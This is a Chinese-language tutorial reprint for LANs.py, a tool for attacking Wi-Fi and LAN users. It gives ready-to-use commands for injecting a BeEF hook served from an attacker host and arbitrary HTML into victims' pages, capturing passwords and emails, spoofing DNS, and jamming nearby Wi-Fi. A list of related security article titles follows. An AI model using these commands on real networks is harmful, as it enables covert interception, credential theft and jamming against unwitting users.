LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

LANs.py功能简介

1.      自动寻找当前网络中最为活跃的WLAN用户,并对其中的一名用户实施监控,然后向该用户所访问的Web页面注入任意HTML或JavaScript代码;

2.      干扰附近的WiFi网络,干扰范围取决于无线网卡的性能。我们可以通过修改配置来实现干扰所有人的WiFi信号或仅干扰某一特定用户的WiFi信号。但是LANs.py不支持对用户同时进行WiFi干扰和监听。

依赖组件

Linux、python-scapy、python-nfqueue(nfqueue-bindings
0.4-3)、aircrack-ng、python-twisted、BeEF
(optional)、nmap、nbtscan、tcpdump。(如果你不知道目标用户的IP地址,那么你还需要一块支持混杂模式的无线网卡)

测试环境为Kali Linux,发动攻击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。

所有的可选操作项:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前该工具支持从以下协议收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资源中前135个字符,并自动忽略结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还能够输出任意协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:查看所有的图片

-ip:设置目标IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目标用户所访问的页面中注入一个BeEF钩子( http://beefproject.com/ ,【 参考教程 】),注入的参数会包裹在<script>标签中,所以你可以在一个JavaScript文件中的任意位置输入内容。

python LANs.py -c'<title>Owned.</title>'

向目标用户所访问的页面中注入任意HTML代码。工具首先会尝试在第一个<head>标签之后注入内容,如果失败则尝试在第一个</head>标签之前注入内容。上面给出的示例代码会将页面标题(title)修改为’Owned.’。

读取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

为了成功读取pcap文件中的内容,你需要使用-ip参数指定目标IP。该功能的一个优点就是用户无需使用root权限便可执行该脚本。

DNS欺骗:

python LANs.py -a -r 80.87.128.67

-a选项将会对目标发出的每一次DNS请求进行欺骗攻击,并将用户请求重定向至-r参数所制定的地址。无论用户在地址栏中输入的是什么地址,他们都将会被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

该命令将会对域名eff.org及其子域名进行DNS欺骗。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干扰所有的WiFi网络:

python LANs.py --jam

仅干扰指定接入点:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用选项

常规使用:

-b BEEF_HOOK_URL:将BeEF hookURL注入到目标用户所访问的每一个页面中,例如-b http://192.168.1.10:3000/hook.js 。

-c ‘HTML CODE’:向目标用户访问的页面中注入任意HTML代码。

-d:查看目标用户访问的图片。

-dns DOMAIN:对指定DNS域名进行DNS欺骗攻击,例如-dnsfacebook.com。

-a:对用户的所有DNS请求进行DNS欺骗攻击。

-r IPADDRESS: 仅用于-dnsDOMAIN选项。

-u:打印出目标用户所使用的URL地址。

-i INTERFACE: 指定接口,例如-i wlan0。

-ip:指定目标IP地址。

-n: 对目标执行nmap扫描。

-na:在后台对目标执行更具攻击性的nmap扫描,并将扫描结果输出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

-pcap PCAP_FILE: 解析pcap文件中所有的数据包; 需要输入-ip[target's IP address]参数。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:对2.4GHz无线接入点以及客户端进行干扰攻击。

WiFi干扰:

-sMAC_Address_to_skip:指定需跳过的MAC地址。

-m MAXIMUM: 指定攻击客户端的最大数量。

-t TIME_INTERVAL: 设置攻击间隔。

–packets NUMBER:指定每一次攻击中发送的数据包数量。

–accesspoint ROUTER_MAC:输入目标AP的MAC地址。

本文作者:佚名

来源:51CTO

时间: 2024-09-17 03:56:22

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具的相关文章

零日漏洞DoubleAgent的代码注入和持久性攻击技术分析

本文讲的是零日漏洞DoubleAgent的代码注入和持久性攻击技术分析, 近日Cybellum的安全专家发现了一种新型的零日漏洞病毒,该病毒会在攻击计算机前先破坏杀毒软件,Cybellum的安全专家将这种攻击手段命名为 DoubleAgent. DoubleAgent通过向杀毒软件注入代码从而修改杀毒软件的进程,进而获得设备的完整权限来对用户进行攻击. DoubleAgent利用了存在于Microsoft Application Verifier(应用程序检验器)的漏洞,目前确认的受影响的设备包

新型“无文件”+代码注入勒索软件SOREBRECT现江湖

Trend Micro安全研究人员警告称,新浮现一款名为"SOREBRECT"的勒索软件,其结合了"无文件"攻击和代码注入两种攻击方式. 攻击方式 Trend Micro公司表示,几个月前,SOREBRECT设法感染中东组织机构的网络和系统被发现.这款勒索软件具备不寻常的加密技术,滥用PsExec公用程序利用代码注入,同时还注重隐身. SOREBRECT装有自毁程序,将自身变成"无文件"威胁,即终止主要的二进制文件之前,将代码注入合法系统进程.此

注入攻击-SQL注入和代码注入

注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险.实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功.虽然这是最明显的组合关系,但是注入攻击带来的不仅仅是 XSS. 注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据.这种类别的攻击包括跨站脚本攻击(XSS).SQL 注入攻击.头部注入攻击.日志注入攻击和全路径暴露.当然限于篇幅,这里只是一个简单的介绍. 这类攻击是每个程序员的梦魇.它们

无需Ptrace就能实现Linux进程间代码注入

本文讲的是无需Ptrace就能实现Linux进程间代码注入, ptrace系统调用 ptrace系统调从名字上看是用于进程跟踪的,它提供了父进程可以观察和控制其子进程执行的能力,并允许父进程检查和替换子进程的内核镜像(包括寄存器)的值.其基本原理是: 当使用了ptrace跟踪后,所有发送给被跟踪的子进程的信号(除了SIGKILL),都会被转发给父进程,而子进程则会被阻塞,这时子进程的状态就会被系统标注为TASK_TRACED.而父进程收到信号后,就可以对停止下来的子进程进行检查和修改,然后让子进

Android平台上最好的几款免费的代码编辑器

使用正确的开发工具能够快速有效地完成源代码的编写和测试,使编程事半功倍.在网络信息高速发展的今天,移动设备的方便快捷已经深入人心,越来越多 的程序员会选择在任何感觉舒适的地方使用移动设备查看或者编辑源代码.于是,Android平台上大量基于代码编程的应运而生,谷歌应用商店里的代码编辑 器.编译器和开发环境比比皆是.由于不同的工具特性和缺点不尽相同,因此如何选择一款最适合自己的开发工具便成了一件头疼的事情.在这里,我们列出了 Android平台上5款最好的代码编辑器来帮助你作出选择. 1. Quo

Bash代码注入安全漏洞{Cool}

Coolshell.cn [童鞋们,移步过去coolshell看吧,这里只是备份下,因为我觉得酷壳的文章表达都很清晰易懂,毫无赘述,而且语言流畅,我喜欢的我就想多备份下] 很多人或许对上半年发生的安全问题"心脏流血"(Heartbleed Bug)事件记忆颇深,这两天,又出现了另外一个"毁灭级"的漏洞--Bash软件安全漏洞.这个漏洞由法国GNU/Linux爱好者Stéphane Chazelas所发现.随后,美国电脑紧急应变中心(US-CERT).红帽以及多家从事

推荐一款优秀的代码编辑软件--Source Insight

      "工欲善其事,必先利其器",好的工具能够提高我们办事的效率,进而提升团队乃至企业的竞争力.         对于软件开发工程师来说,选择一款优秀的代码编辑软件也是很重要的.最近,我看到有很多同事还在用微软的VC ++ 6.0进行代码的编写,感到非常的吃惊.因为在我看来,那款软件存在很多的不足,包括:无法设置背景.代码跳转不方便.换行时会出现Tab键等.         在此,为大家推荐一款个人觉得很适合代码编写的软件--Source Insight.有关这款软件的介绍请参考

《Web性能实践日志》一1.2 代码注入

1.2 代码注入 很幸运,Windows提供了几种向进程中注入任何代码的途径.http://www.codeproject. com/KB/threads/winspy.aspx这里介绍了几种不同方法,当然还有很多其他方法,但是大部分方法这里都有了.有些方法可以把你的代码插入到每一个进程中,但是我想要更有针对性一点的方法,比如仅仅使用我们感兴趣的浏览器作为分析工具.所以经过一些错误尝试后,我最终决定使用CreateRemoteThread/LoadLibrary方法,这个方法基本可以允许你强制任

小心!Google Play 中出现首个使用代码注入Android恶意软件——Dvmap

本文讲的是小心!Google Play 中出现首个使用代码注入Android恶意软件--Dvmap, 前言  从2017年4月开始,研究人员就开始在Google Play商店发现了一个新出现的安卓root恶意软件.与其他root恶意软件不同,该木马不仅能将其模块安装到系统中,还会将恶意代码注入到系统运行的时间库来获取root权限并保持持续访问.目前,卡巴斯基实验室目前已经将其命名为Trojan.AndroidOS.Dvmap.a. 通过Google Play传播root恶意软件并没有什么惊奇的,